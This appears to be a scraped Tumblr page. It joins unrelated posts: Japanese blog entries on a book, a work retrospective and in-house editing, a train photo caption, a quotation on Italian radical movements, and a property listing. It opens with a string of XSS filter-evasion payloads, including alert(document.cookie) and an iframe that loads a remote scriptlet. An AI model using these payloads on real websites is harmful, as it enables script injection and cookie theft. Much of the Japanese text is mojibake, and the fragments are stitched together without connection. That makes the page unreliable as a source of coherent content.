ONLOAD=alert('XSS')> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <marquee onstart='javascript:alert('1');'>=(?_?)=
1 note
·
View note
Text
èªãã ããããŒã«ã®ãããªããšã°ãã
![Tumblr media](https://64.media.tumblr.com/1bd00026fa74fd0cdb163436cddd8e09/tumblr_inline_ppygz3KTj71wzbw5q_250sq.jpg)
ããŒã«ã®ãããªããšã°ã (ã»ãŒæ¥æ庫)
posted with amazlet at 19.04.14
糞äºéé æ±äº¬ç³žäºééäºåæ 売ãäžãã©ã³ãã³ã°: 15,256
Amazon.co.jpã§è©³çŽ°ãèŠã
è²·ã£ãŠããèªã¿çµãããŸã§ã«ïŒå¹Žãããããã£ãã èªã¿ç¶ããŠ6幎ããã£ããšããããã§ã¯ãªããå¯ãåã«è©©éã®ã€ããã§å¿
èŠã ãšæã£ããšãã«èªãã§ããããããªã£ãã 糞äºããã¯è©©ãæžããããã§ã¯ãªãᅵᅵᅵãèšå€§ãªéã®åçš¿ã®äžããããã¯ã¢ãããããããšã°ãã¡ã§ããããæ£ç¢ºã«èšããšè©©éã§ã¯ãªãã®ã ããã©ã
ãã®æ¬ã«ã¯ããããããããã ããããšèªåã®èžã¿ãããŠããå°é¢ã確信ããŠããããšæãããŠããããããããŸããã®ããšã°ããããããã£ãããããããŸããã ãšæã£ãŠããŸãã®ã¯å€§äººã ãããããããªãã
ããŸè¡šçŸãããããããŸããã¯ããªãã®å€æã¡ããªããããªãã®ãšããæå³ã§ã¯ãªã㊠å¯ããšãã¯æ¯ç£šããããšãçªã¡ãããšåããããšãããããæãã®ããšã çåœãšããŠæãããšãã¿ãããªæããã ãããªãã ã£ãŠããã®ïŒãã£ãŠæã£ã¡ããããªãã®ã«äººéå²æ
¢ã ããã€ãæã£ã¡ãããã€ã
äœåºŠããåã©ãã®ãšãã«èªãã§ããããªãã£ãŠæããã®ããã£ããã©ãå¥ã«ãè¯ãããšæã£ããã ããä»ã§ãããããªã£ãŠæãçŽãããããããããã£ãšæ©ãã«ããæ£ç¢ºãããããªãããã©ãæ©ãã«èªãã§ãŠä»ãšåãããšãæã£ããã©ãããªããŠããããªããã ãããããŸãè¯ããã£ãŠæã£ããããã§ãããã ãšæãã
> çªãåãã®ãããã©ããããšæãããããšãã¯ã > ãããŸããããªãã > ããã©ããããšãã奜ãã å«ãã ãšãèšããã«ã > çªãªããåãããã ãã > çãããšããã®ã¯ãçªãåãããšãŸã§ã»ãããªãã ãã
ããããã³ãã«ããã ãªã£ãŠæãã èªåã®çªã䌞ã³ãŠããã®ãç¥ã£ãŠããã®ã«åããªããšãã£ãŠããºã€æã ã å¿ããã«æ¯ãåãããŠããµãšæã«åã£ãåã©ãã®æãèŠããçªã䌞ã³ãŠããæã£ãŠ ãã®ãããã·ã§ãã¯ã ã£ããããããªããŠããšãããŠããŸã£ããã ãã£ãŠãªãã
倧人ããããããããããŸãããããããªãããšã°ã åã©ãã«ã¯å¿
èŠãªãšãããããããããªãã
ãããããŸãããèšã£ãŠããããªããªã£ãããšãªãã ãããããŸãããªããšã°ãå¿
èŠãšãããšãããããããããªãã
ãããããŸãããæ£é¢ãããªãã®ãŠããããªãèšã£ãŠããã人ã¯å°ãªããšæãã ãããŠããããªã«ã³ã¿ã³ã«ãããããŸãã§ããããšã¯èšã£ã¡ããããªããã ãšãæã£ãã
ãããŒã«ã®ãããªããšã°ãã·ãªãŒãºã¯è¿æã®æ¬å±ã ãšæ庫æ¬ã®ã³ãŒããŒã«ãããã ãã© ãã£ãšè¥ã人ãã¡ã®ç®ã«å±ãå Žæã«ããã°ããã®ã«ãªãããšæã£ãã
1 note
·
View note
Text
![Tumblr media](https://64.media.tumblr.com/b770bc6642fda868089cb01bf0235292/914b8a81af10c309-ba/s540x810/d3014a589a658bf89fe9f2c9555096317fa2c7db.jpg)
![Tumblr media](https://64.media.tumblr.com/7a00b33f095bf5f50b7ec2cd8566a484/914b8a81af10c309-fe/s540x810/a1657aa99a9ef3575a3d429176819c77a0824e7b.jpg)
![Tumblr media](https://64.media.tumblr.com/a6092658d40d8337acdd11e1af117c49/914b8a81af10c309-56/s540x810/472aaef32db40d6ab95b9251655a814a62056cc9.jpg)
Class 108 DMU at the Severn Valley Railway's spring steam gala, 20/04/2024.
0 notes
Text
In the usually volatile and conflictual conditions in which radical social movements develop, their organizational transformations will not necessarily be the same or even follow the same direction, depending on their specific internal and external dynamics, which may lead some groups to become more reformist or moderate, while others become radicalized, even in response to the same events. In this context, it can be argued that, while Workerist and BR groupings developed out of the same environmental resources and in response to common events and interactions, their internal organizations constituted distinct organizational ecologies, leading to quite distinct strategies and tactics. Similarly, in her comparison of the environmental resources available to radical groups in Italy and Germany, della Porta argues that the Italian situation was a distinct environment in that it permitted an encounter between student and worker radicalism that was not possible in Germany, âonly in Italy did the students âmeetâ the working classâ (1995, p. 108; emphasis in original). This encounter of radical students with workers and their modes of organization led to distinctive organizational structures in Italy, which tended to be, in della Portaâs view, âfairly centralizedâ (1995, p. 109). This encounter also led to a distinctive repertoire in Italian social movements in which tactics such as wildcat strikes, industrial sabotage, and organized housing occupations could play a leading role.
Michael Goddard, Guerrilla Networks: an Anarchaeology of 1970s Radical Media Ecologies
6 notes
·
View notes
Text
10841 N 108th Dr, Sun City, AZ 85351
10841 N 108th Dr, Sun City, AZ 85351 Wholesale Price $164,990 ARV $240,000 Peoria & 107th Ave; 2 Bedrooms / 2 Baths / 2 Car Garage 1,330 sf Living Area (per tax records) 8,585 sf Lot Size 1961 Year Build
Wholesale Price $164,990 ARV $240,000
![Tumblr media](https://64.media.tumblr.com/42aeb43e7b23ea4ef45036451bf0d4ab/df828465a3a46d26-34/s500x750/0652f65269b2914aa386d3806114bfd1b569916d.jpg)
10841 N 108th Dr, Sun City, AZ 85351 More Property Photos Call Kevin to Make Offer Peoria Avenue & 107th Avenue
This wholesale property is
2 Bedrooms / 2 Baths / 2 Car Garage 1,330 sf Living Area (per tax records) 8,585 sf Lot Size 1961 Year Build $3,500 HOA Transfer Fee
Wholesale Price: $164,990 After Repair Value $240,000 108âŠ
View On WordPress
0 notes
Text
202001 Retrospective
![Tumblr media](https://64.media.tumblr.com/99208f90075673a06b6f68e9fa7d95b1/136dfdc61497417f-79/s540x810/e1ff39cf696ac7f891d5ec29849a08def1c555ba.jpg)
ãã°ããæ1ã§æ¯ãè¿ããæžããŠã¿ãããšã«ããã
ä»äº
å°ããã§ãŒãºãå€ãã£ãŠããŠãMTG ãå€ããªããæéã®ã³ã³ãããŒã«ãé£ãããªã£ãŠãããããã§ãåºç€Ÿæéãšåž°å®
æéã¯å€ãã£ãŠãªãã®ã§ãå人çã«ã¯ç¹ã«åé¡ãªãã
MTG ãå€ããªã£ãã®ã§ãSprint ã®äœæ¥ã¯ã¡ã³ãã«ãŸãããŠãããŒã ã®ã³ã³ãããŒã«ã E2E ã®ä»çµã¿ã®åæ§ç¯ãããããE2E ã¯ãããŸã§ãProtractor ã䜿ã£ãŠããããCI ãã¿ã€ãã³ã°ã«ãã£ãŠã³ã±ãããšããã£ãŠãã¡ã³ãã«è©±ãã㊠cypress.io ãè©ŠããŠããããŸã 䜿ãå§ããã°ãããªã®ã§ã¿ã€ãã³ã°åé¡ãã©ã®çšåºŠæ¹åã§ãããåãããªãããããã¥ã¡ã³ããè¯ããŠãCI ãžã®çµã¿èŸŒã¿ãŸã§ãããªã«æéãããããªãã£ãã
倧åæéã®äœ¿ãæ¹ãã·ãã¢ã«ãªã£ãŠããŠããã®ã§ãä»æ㯠Sprint å€ã§äœ¿ã£ãŠããæéãã©ã®ãããã«ãªã£ãŠããããæ°ã«ããªããåãããã«ãããèªåã§ã§ããªãããšã¯ã¡ã³ãã«ä»»ãããã¡ãã£ãšã ãå
åãããŠãããŒã ã®æŽ»åã«ã¬ãã¬ããžãå¹ãããã«ããã
ç掻ã¹ã¿ã€ã«ã®æ¹å
å¹³æ¥ã«äŒç€ŸãŸã§æ¯æ¥ 30 åçšåºŠæ©ãããã«ããŠããããããã¯ãããŸã§çéã ãã ã£ãã®ã§ããªãã¹ãåŸåŸ©åŸæ©ã«ããããšã«ãããåŸåŸ©æ©ããšãäžæ¥çŽ 1 æéæ©ããŠããããšã«ãªããçé 30 åæ©ããŠãããã®åŸã®é»è»ç§»åã®éœåã§ãããŒã¿ã«ã®ç§»åæéã¯15å延ã³ãã ããªã®ã§å©ãããç¹ã«åž°ãã®é»è»ã¯ããŒã ã§10åãããåŸ
ã€ããšãå€ãã®ã§ãããŸãå€ãããªããããããªãã
æè¡
Graal ã® Truffle ã䜿ã£ãŠå®è£
ããŠããã³ãŒããèŠã€ããã®ã§ãããã䜿ãæ¹åã§ã³ãŒããæžãçŽããŠãã件ã¯ãããããåŒãç¡ãã·ã³ãã«ãª Projection ãåããšãããŸã§æ¥ããTruffle ãã©ããããšãã以åã«ãAvatica ã䜿ã£ãŠ JDBC Driver ãå®è£
ããã®ãæã£ããããé£ããã£ãã
Truffle ã®ãšããã§ããSQL ã eval ããçµæãè¿ããšããã§å€§åᅵᅵæŠããããšã«ãTruffle ã¯è»œã觊ã£ãŠããã ããªã®ã§ããã®å解決ã«æéã䜿ã£ãŠããŸã£ãããã®é¡æ«ã¯ä»¥äžã«æžããã
Truffle ã® Host ã«ãªããžã§ã¯ããè¿ã
ä»æ㯠Filter ãå®è£
ããŠã¿ãäºå®ã
OSS
Angular 㧠cypress.io ãæ±ãçºã«äœ¿ã£ãŠãã cypress-schematic ãšããã©ã€ãã©ãªã§ã¡ãã£ãšåé¡åºãã®ã§ããã®å¯Ÿå¿ã§å°ãæéã䜿ã£ããissue ã«ç»é²ããçµæãWorkaround ãããããšãåãã£ãã®ã§ãããã§è¯ããšããããšã«ã
ng e2e" failed on Angular7 · Issue #29 · briebug/cypress-schematic
è±èª
ãªã³ã©ã€ã³åŠç¿ã®è©±ã¯ããªãŒããŒãæãŸããªã㊠1:1 ãã§ãããé²ããããªãã£ããä»ææ©ã
ã«ãå§ãããã
é±äžã®äŒç€Ÿã® English Workshop ã§ãããŸããŸã¡ã³ããŒãæãããè¬åž«(äžåžã®äžåž)ãš 1:1 ã§èªåã®è±èªã®æ¹åç¹ã«ã€ããŠè©±ããããè¬åž«ããæ¥æ¬èªãèŠããçºã«è²ã
ãšå·¥å€«ãããããã1) ãã¬ãŒãºãèŠããŠäœ¿ããããã«ãªãããšã2) Listening ããã Speaking (Shadowing ãšã) ãé 匵ã£ãæ¹ãè¯ãããšããã¢ããã€ã¹ãè²°ã£ãã®ã§ãSpeaking ã®æéãå¢ããããã«ãããã
æ¬
(Amazon ãžã®ãªã³ã¯ã«ã¯ã¢ãã£ãªãšã€ãã® ID ãåãŸã£ãŠããã®ã§ãæ°ã«ãªãæ¹ã¯ã泚æã)
![Tumblr media](https://64.media.tumblr.com/41169bb633a169c293e1294e9c59ba03/136dfdc61497417f-94/s250x250_c1/b8b1beb333e5ba261a8260b0c30e06d2efecd1a0.jpg)
å¿ã
posted with amazlet at 20.02.02
çš²çå倫 ãµã³ããŒã¯åºç 売ãäžãã©ã³ãã³ã°: 688
Amazon.co.jpã§è©³çŽ°ãèŠã
çš²çå倫ã®èæžã奜ããªã®ã§è²·ã£ãŠã¿ããã¿ã€ãã«ã«ããããã«ããããŸã§ã®èäœãšæ¯ã¹ããšãã¹ããªãã¥ã¢ã«ãªè©±ãå€ããå¿ãããªã£ãŠãããšãä»äºã®å€§åããè¬èãã¯å¿ããŠããŸããã¡ãªã®ã§ãè¯ãã¿ã€ãã³ã°ã§èªï¿œï¿œãã
![Tumblr media](https://64.media.tumblr.com/91bec6e106efaf480a6d4f28db6402ff/136dfdc61497417f-a3/s250x250_c1/1d84cdff9100213a431e80b6236cd85edd985bd2.jpg)
èªåã¯èªåããã«ã¯ãã«ããä»äººã«æ¯ãåãããªãäžäººåã¡ã¡ã³ã¿ã«è¡
posted with amazlet at 20.02.02
SBã¯ãªãšã€ãã£ã (2019-04-06) 売ãäžãã©ã³ãã³ã°: 1,271
Amazon.co.jpã§è©³çŽ°ãèŠã
Kindle ã®ã»ãŒã«ã®æã«è³Œå
¥ãã²ããã㯠Web ã ãšãå£ãããŸããè°è«ã«è² ããªããã²ãããè
ããšãããã£ã©ã¯ã¿ãŒã匷ããã©ãã¿ã€ãã«ã®è©±ä»¥å€ã«ãã人ãšã®è·é¢æã®ãšãæ¹ãå¹çŽã®ä»æ¹ããèŠç¹ã®å€ãæ¹ã幞çŠåºŠã®èãæ¹ãªã©ãé¢çœã話ãå€ãããµã¯ãµã¯èªããã®ã§ãã¡ãã£ãšæéã空ããæã«ãSNS ãèŠãã®ã®ä»£ããã«èªãã®ã«è¯ãããŸãã»ãŒã«ã®æã«ã¹ããã¯ããŠããã
èªã¿ããã®æè¡æžããããã®ã®ãèªã¿ãããªãã£ãã®ã§ãããã¯ãŸãæ¥æã
é³æ¥œ
äŒç€ŸãŸã§ã®åŸæ©ã®æéãå¢ããã®ã§ãé³æ¥œãèŽãæéãå¢ããã
![Tumblr media](https://64.media.tumblr.com/4df27c8535da6bc787ee7b88a2f731d9/136dfdc61497417f-8e/s250x250_c1/2193f392af5e11f0b4de7169c947c6792ce6853d.jpg)
Tomodachi Sessions
posted with amazlet at 20.02.02
Makoto (Dance Soul) Hospital Records
Amazon.co.jpã§è©³çŽ°ãèŠã
youtube
Makoto ã® "Tomodachi Sessions" ããšãŠãè¯ãã£ãã®ã§ãããã°ããèŽããŠãã
![Tumblr media](https://64.media.tumblr.com/4fdf2dc83e7a326765b555fee2f7a5f5/136dfdc61497417f-de/s250x250_c1/ca65dce36e9064d3a82c460bebb5c948dfd54f76.jpg)
Bobby [12 inch Analog]
posted with amazlet at 20.02.02
Lenzman Metah (2019-04-05) 売ãäžãã©ã³ãã³ã°: 1,081,257
Amazon.co.jpã§è©³çŽ°ãèŠã
Lenzman ã®æ²ã¯ D'N'B ã ãã©æ¯èŒçããšãªãããæ©ããªããèŽãããããèªå®
ã§èŽããŠãããšãå€ãã£ãã
![Tumblr media](https://64.media.tumblr.com/3a75841fae7e97e2854c6cda0a83068d/136dfdc61497417f-3f/s250x250_c1/03934f7c7ccc094d2b73132ed57ef12982a333ef.jpg)
Big Bad Bass
posted with amazlet at 20.02.02
Dillinja & Lemon D Valve (2002-05-27) 売ãäžãã©ã³ãã³ã°: 947,663
Amazon.co.jpã§è©³çŽ°ãèŠã
D'N'B ç¹ãã㧠Lemon D & Dillinjaã2人ãšããšãŠã奜ããªãã ãã©ãMetalheadz ã®ã³ã³ã以å€ã§ CD ã§å£²ã£ãŠãã®ãèŠãããšãç¡ããŠããµãã¹ã¯ããããããªããšã
0 notes
Text
ãäœéšè«ãäºæ¥äŒç€Ÿã®1人ç®ã®ã€ã³ããŠã¹ãšãã£ã¿ãŒãšããŠå
¥ç€Ÿããä»ã®è·çš®ã®äººãã¡ãšããŸãä»ãåãããã«å¿
èŠãªã¹ãã«ãšå¿æ§ã
![Tumblr media](https://64.media.tumblr.com/1c8957434b54d16a9aaa64550d8fc908/tumblr_inline_p09vc9oH3r1tq08ks_540.jpg)
çµè«ãšããŠã¯ã
ã€ã³ããŠã¹ã®ç·šéã»ã©ã€ã¿ãŒãäºæ¥äŒç€Ÿå
ã§æåŸ
ãããåã㯠âããŒã± à PRâ ã£ãŠæããªãã§ããèªåã®ä»äºã¯ããæç« ãæžãããšããšãããã ãããæšãŠããã€ãã£ããã®ã§äºæ¥ã®æé·ã売äžã«ã©ãã ãè²¢ç®ããã®ãããã¯ãªã¢ã«ãããããšããããã¯å§åçãªæå¬ãšã³ãã¥åã§ããäŒãã
ãšãã話ã§ãã
åœããåã®è©±ã§ãããã€ã³ããŠã¹ã®ç·šéã»ã©ã€ã¿ãŒã®çæ³åœ¢ã¯ãããã¡ã®ç·šéè
㯠âãã®ãã€ããâ ããšã§ãã£ã¡ãäºæ¥ã®æé·ã«ã³ãããããŠããããªãããšèªããããå°äœããããã£ã¡ãããã³ã³ãã³ãã€ããããããã®äººã¯å¥ã«å£²äžãšãã§æž¬ããªããŠãããããããªããããšããå°äœãç¯ãäžããããšã§ãã
ãããããªåœããåã®ããšã ãã note ã Medium ã«æžããŠçµããã®ãèžããªãã§ããããããŸã§ãã£ãšã€ã³ããŠã¹ã® PR Editor ãšããŠä»äºãããŠããèªåãªãã§ã¯ã®èŠç¹ã亀ããŠãããã¡ããæãäžããããšããèšäºã«ãªããŸãã
æè¿ã¯ Web ç·šéè
ã®ãã£ãªã¢ã®å¯èœæ§ãªããŠããæèã§ãã€ã³ããŠã¹ã§ã®ãšãã£ã¿ãŒãä»åŸãã£ãšæ±ããããã®ã§ã¯ãšãã£ãé¡æã£ãœã話ãããŸã«èãããããã«ãªããŸããã
ã§ãããå®éã«äŒæ¥ãæ±ããŠãããšãã£ã¿ãŒåãšãäžã®äžã«ãããããããšãã£ã¿ãŒã»ã©ã€ã¿ãŒã®ã¹ãã«ã»ããããã€ã³ãã¯çµæ§ãºã¬ããããšæã£ãŠããŸãããã®ãžããå€ããŠãããšãäžã®äžã«ãããæã
ã®å°äœãå°ãã¯ãã·ã«ãªãã¯ãã§ãã
ã§ã¯ Short ver. çµäºãšããããšã§ããããã㯠Full ver. ãšãªããŸãïŒæåæ°ã¯ 10,000 åã»ã©ã§ãïŒ
â» ãã®èšäºã¯ ç·šéãšã©ã€ãã£ã³ã°ã«ãŸã€ããã¢ã¬ã³ã¬ Advent Calendar 2017 äŒç»ãžã®å¯çš¿ïŒã§ãã
--
ç§ã¯ãã 4ã5 幎ãè€æ°ã®äºæ¥äŒç€Ÿã§ 1ã2 人ç®ã®ã€ã³ããŠã¹ãšãã£ã¿ãŒå
Œ PR çãªããžã·ã§ã³ãšãªããã¡ãã£ã¢ç·šéãšã Web å¶äœãSNS ãåºåéçšãç·æ¥äºæ
ã«ã¯æ åç·šéãã³ãŒãã£ã³ã°ããã£ãŠããŸãããAtom ãã㯠Brackets 掟ãªã®ã§ããé ŒãããããŒã¯ããŠã³ãšãã£ã¿ãå·Šå³åå²ã«ããŠã»ããïŒãªããäžäžåå²ããã§ããªãïŒã
â 1 人ç®ã®ã€ã³ããŠã¹ãšãã£ã¿ãŒâ æ倧ã®é
åã¯ãå¹
åºãä»äºãèªåã®è£éã§å¥œãã«ãããããšã瀟å
ã«å³æ¹ã¯çç¡ã§ãããç·šéè
ã¯ããããã¹ãã ãã©ããããæ¥çã®ãããŒã§ããçŸããäŒçµ±ãªãã ãã©ããªã©ãšèšãããããšããªãã®ã§ã100 % èªåã®è²¬ä»»ã®ããšã䌞ã³äŒžã³åãããšãã§ããŸãã
ããã§ä»åã¯
ã¡ãã£ã¢éå¶ãäºæ¥ã«ããŠããªãã¿ã€ãã® IT ç³»äºæ¥äŒç€Ÿ
ãããã¯èªç€Ÿäºæ¥ãš PR ã«ãåãå
¥ããŠããããå¶äœäŒç€Ÿ
瀟å¡æ°ã¯ 30ã300 人
ãšããäŒæ¥ããã€ã³ããŠã¹ã® Web ç·šéè
ã»ã©ã€ã¿ãŒã瀟å¡ã§ 1ã2 åæ¡çšããããšããŠãããšããç«ã¡äžãã¡ã³ããŒãšããŠå
¥ã£ãŠããããã«ã¯äœãéèŠãããšããããŒãã§æãäžããŠãããŸãã
äºæ¥äŒç€Ÿã®äžã§ âãªãããããããããã©ã³ã³ãã³ããã€ãããããã人â ã«éã£ãŠããæ¡ä»¶ãšããã°
ãªãŠã³ãã¡ãã£ã¢ããã£ãŠã»ãã
äŒç€ŸããµãŒãã¹ããã£ãšç¥ã£ãŠãããããã«ç€Ÿå
ããã°ã SNS ããã£ãŠã»ãã
è¯ãæãã§ãᅵᅵã¹ãªãªãŒã¹ãæžããŠã»ãã
顧客åãã®ã¡ã«ãã¬ãæžããŠã»ãã
æ±äººåºåãã¹ã«ãŠãã¡ãŒã«ãæžããŠã»ãã
Web åºåã®ã¯ãªãšã€ãã£ãïŒæèšïŒã§ CPA é«ãæãã®ãã€ãã£ãŠã»ãã
åèšã® Web å¶äœã®ã³ããŒã©ã€ãã£ã³ã°ã»ã¢ãã¯å¶äœãšãããã£ãŠã»ãã
ãããç·åçã«å€æããŠåªå
é äœãã€ãã€ã€éãããäºç®ã®äžã§å©çã«ã³ãããããŠã»ãã
ãªã©ããããããã㪠âã€ããâ çµéšãç©ããŸããããæ¡ä»¶ããšã«
ããããªè·çš®ã®äººãš
1 察 1 ããã㯠â 1 察å€â ã§
ç°ãªãèšèªã§
åæ»ã«ã³ãã¥ãã±ãŒã·ã§ã³ããšãå¿
èŠããããŸãã
ããããæŠå Žã«äžžè
°ã§çªã£èŸŒãã§ãã£ãŠããããã«ãããŠåž°ã£ãŠããŠãã©ã€ã¿ãŒãã¡ãéãå Žæã§ããã£ã±äºæ¥äŒç€Ÿã¯ç§ãã®ããšç解ããŠããããããããããç·šãããšãã³ã³ãã³ãã¡ãŒã«ãŒã§ãã£ããè
°ãæ®ããŠåãããããæ代ã¯äºæ¥äŒç€Ÿã§ã®ã€ã³ã¿ãŒã³ãã Twitter ã®ãã©ãã¯ãŒå€ãæåã©ã€ã¿ãŒãžã®åŒåå
¥ãã ããããšã倢èŠãŠãã ãã ãšããã€ãŸã§ãã£ãŠã第äºã® WELQ ã¿ãããªã¡ãã£ã¢ã«æ€çŽ¢äžäœããžã£ãã¯ããããæè©®ã¯ãããã¡ãã£ã¢ã ããããšè»œèŠãããèŠæš¡ã®ã¡ãã£ã¢ããã€ãããªã人çã§çµãããšæãã®ã§ãäºåã«æŠè£
ã¯ããŠãããããšããã§ãã
â»ãã®èšäºã«ãããçŠå¥ ïŒ çåãã€ã¢ã¹
瀟å
ã«åæ¥è
ããªãã€ã³ããŠã¹ãšãã£ã¿ãŒïŒã©ã€ã¿ãŒïŒã®ãè¶
ã¢ãŠã§ãŒæãç¥ã£ãŠãïŒ
å®éããã°ãããšã¯ãããããããŸãã
ã©ããªã¹ãã«ãæã¡åãããŠããããããããããããã âã©ã€ã¿ãŒâ ã§ã
ããªãããããã©ã€ã¿ãŒããã¯ç·šéã®ã»ãããã£ãªã¢é·ãã§ãïŒããšèšã£ãŠãããã¶ã瀟å
ã§ã¯ãã©ã€ã¿ãŒã® â¯â¯ ããããšåŒã°ããŸããç§ãäžè¬ç㪠Web ç·šéè
ã«æ¯ã¹ããšããªã Web ããŒã±ã»å¶äœå¯ãã®ã¹ãã«ã»ãããªã®ã§ãããã ããããã©ã€ã¿ãŒã®ãããããããšçŽ¹ä»ãããŠããŸããããã€ããŒåªç§ãªãããŒãžã£ã ãã¯é ãªã«ããã¡ã®ãã£ã¬ã¯ã¿ãŒã§ãããšçŽ¹ä»ããŠããŸãããã
ããã¯ã ããããç·šéè
is äœããšããåæç¥èã®äžè¶³ãåå ã ãšæãããŸãããã©ã€ã¿ãŒããšããã°ãæç« ãæžããŠã人ããšã€ã¡ãŒãžããããã
ãŸãããã©ã€ã¿ãŒããšããååãäžäººæ©ãããã»ã©ãæç« ãæžãããšä»¥å€ã®ã¹ãã«ã¯ãªããã®ãšããŠæ±ãããã¡ãªã®ã§ãèªåãã宣äŒãããä»äºãåãã«ãã姿å¢ãéèŠã§ãã
ãèšäºãããºã£ãïŒãã¡ãã£ã¢ã® PV ã ⯠äžéæïŒãTwitter ã®ãã©ãã¯ãŒ ⯠人ïŒãâãã§ïŒã
Web ã©ã€ã¿ãŒãŸããã®äººãã¡ã Twitter ã§ïœ·ïœ¬ïœ¯ïœ·ïœ¬ããŠãæãã®äŒè©±ã¯ãã ãããã®è·çš®ã®äººããããã âç°åœã®é¢šæ¯â ãªã®ã§ãéãèšèªã§ã®äŒè©±ãšããŠã¹ã«ãŒãããŸãã 瀟å
ã§äžèšã®ãããªã»ãªãããã®ãŸãŸå£ã«åºãããšã¯ããã£ã³ã©ã³ã人ã«æ¥æ¬èªã§ãᅵᅵæ¥ã®é«æ ¡æéå¯å±±ç倧äŒæ±ºåæŠãããã£ããã§ããïŒãé«æ ¡çãšã¯æãããããæé«ã®äžæ¬èè² ã決ãŸã£ãŠããã§ããïŒïŒããšç±åŒããŠãããããªãã®ã§ãã
ã§ãã®ã§ã瀟å
ã§ã®äŒè©±ã Slack äžã§ç解ããŠãããã«ã¯ãéé¡æç®ãããšããã ãå²ãã£ãããVãããïŒãä»æã®ç®æšéæåŸ
ã£ããªãïŒããšãããžãã¹ç®ç·ã§ã®èšèªã«ç¿»èš³ããå¿
èŠããããŸãã
å
¥ç€Ÿ 1 ã¶æçµéæç¹ã§ã®ãã§ãææã¯ïŒã
ãŒãã€ãã§ã®ã¡ãã£ã¢éå¶ãã¡ã€ã³ã®æ¥åã§ãããããå¶æ¥è²ã匷ãäºæ¥äŒç€Ÿã ãšæ©ã㊠1 ã¶æãé
ããšãååæã§ã®ç®ã«èŠããææãæ±ããããŸãã
äžæ¹ã§ãå®éã«ãéãåããããä»äºã«ã€ãªãã£ãããããšãé端ã«æã®ã²ããè¿ããããã«ååšäŸ¡å€ãèªããããã¡ã§ãã ãã ããã®ç¶æ
ã«å°éããã«ã¯çµæ§æéãããããŸããïŒã¡ãã£ã¢ãªããŠå幎以äžããããŸããïŒãèŸãããšããããããããšæãã®ã§ãå ªãå¿ã¹ããã©ãããã€ã³ããŠã¹ãšãã£ã¿ãŒã»ã©ã€ã¿ãŒã®æåã®åããéã ãšæããŸãããªãç§ã¯åè·ã®ãšãå®å
šã«ããã®ã¬ãŠæ°ã¶æã§èŸããããšããŸããïŒé¢ä¿åäœããããšãããããŸããïŒã
ãµã€ãã®ç«ã¡äžãããå
¥ãå Žåããæ°åã¯çµ¶å¯Ÿåºããã§ããšãããã 6ã12 ã¶æã¯æ³³ãããŠãããŸããããïŒããããèšã£ãŠããã»ããããã®ãããããšãã¡ãã£ã¢ã¯ã©ãããŠãæéãããããïŒã¢ãã»ã³ã¹ä»¥å€ã§ã®ïŒå£²ããç«ã¡ã¥ããã®ã§ãåèšã® Web å¶äœãåºåéçšãšãæ¡çšç³»ã®ã¿ã¹ã¯ãã¶ãã©ã£ãŠããŠããããããçæçãªæ°åãã€ãã£ãŠãè¶ãæ¿ãã¿ãããªåŠäžè¡ãçµæ§å€§äºã ãšæããŸãã
ããªãã®åšå²ã«ããåè·çš®ã®ã¡ã³ããŒã®ç¹åŸŽïŒå¶äœã»éçºç³»éšçœ²ïŒ
ãšããããã§ã瀟å
ã§ã®ã³ãã¥ãã±ãŒã·ã§ã³ãåæ»ã«é²ãããããè·çš®å¥ã®ç¹æ§ãšãããŸãä»ãåãããã«å¿
èŠãªããšããŸãšããŸããã
ãŸãã¯åã âãã®ãã€ããâ éšçœ²ããæ°åïŒãæ°åïŒããšãã人ãããªãã®ã§èœã¡çããŠãããã殺äŒãšããŠãããããŸãã
Web ãã¶ã€ããŒã»UI ãã¶ã€ããŒ
ãã£ã¬ã¯ã¿ãŒçãªç«ã¡åããæ±ãããããšããçŽæ¥ãããšãããæ©äŒãå€ãè·çš®ã§ãã
æ¥åå
容ãè¿ããããæ¯èŒçã©ã€ã¿ãŒãšãã«ç解ãããããã«ãèŠããŸãããã©ã¡ãããšããã°åã«ãä»äººã«æ·±ãå¹²æžããªãã人ãå€ãå°è±¡ã§ããæ°åç®æšãèè² ã£ãŠããããã§ããªããã»ãŒã«ã¹ãããŒã±ããã£ã¬ã¯ã¿ãŒã«æ¯ã¹ããšç©ãããªäººãå€ããããããããäºããèµ·ããããšãå°ãªãã§ãã ç©æ¥µçã«æè·ï¿œï¿œãŠãããããã§ããªããã©ã
ãã ãæ·¡ã
ãšãããæãã®ãã£ããã³ããŒèããŠãããããã®ããã¹ãé·ãããåã£ãŠã»ããããšããäŸé Œãããæãã§ãã
ãã¶ã€ãã«ããããããããã©ãç·šéå
ŒããŠããã£ã¬ã¯ã¿ãŒãæãã¬ãã®å§ï¿œï¿œã«ãªãã®ã¯ããŠãŒã¶ãŒã¯æåãªããŠèªãŸãªããã¢ãžã¢ãžããŠããšãã¶ã€ã³çã«ãããµããããå°ããããŠãã®ã«ã©ã ã®äžã«å
šéšæŒã蟌ãã©ããããçãªãã€
â H âarayaâ Takahashi (@51__araya) 2017幎11æ28æ¥
ããŸã«ããããæŠäºã¯èµ·ããŸããããŸãäºçŽ°ãªããšã§ãã
å人çã«ã¯ãç解ãããããšããããã¯ãããªããšãªãè¯ãæãã«ãä»ãåãããããããã®æž©åºŠæããã¹ãããªãšæããŸããåãããã¶ã€ã³ã®è¯ãæªããšããããªããããŸãããããªããå端ã«ããã¶ã€ã³ã£ãŠããã§ããããããããããŸãã
ãããšãåãã£ããããªå£ããããªãã»ãããããšæããŸãã
ããšåçãšãã«ã¡ã©ã奜ããªäººãå€ãã®ã§ããã£ã¡ç³»ã«è©³ãã人ã¯ä»²è¯ããªããã£ãããã§ããŸãã
ãšã³ãžãã¢ïŒã³ãŒããŒïŒ
ç¥ã§ãã
ããªããšã³ãžãã¢ã¯ç¥ãªã®ãããšãããšã³ããªã¯åäœã§æ°ååæžãããšæããŸããä»åã¯å²æããã ãç¥ã ãã察çã§ã¯ãªããåŽããªããã°ãªããªãååšããšããããšã ãé ã«å
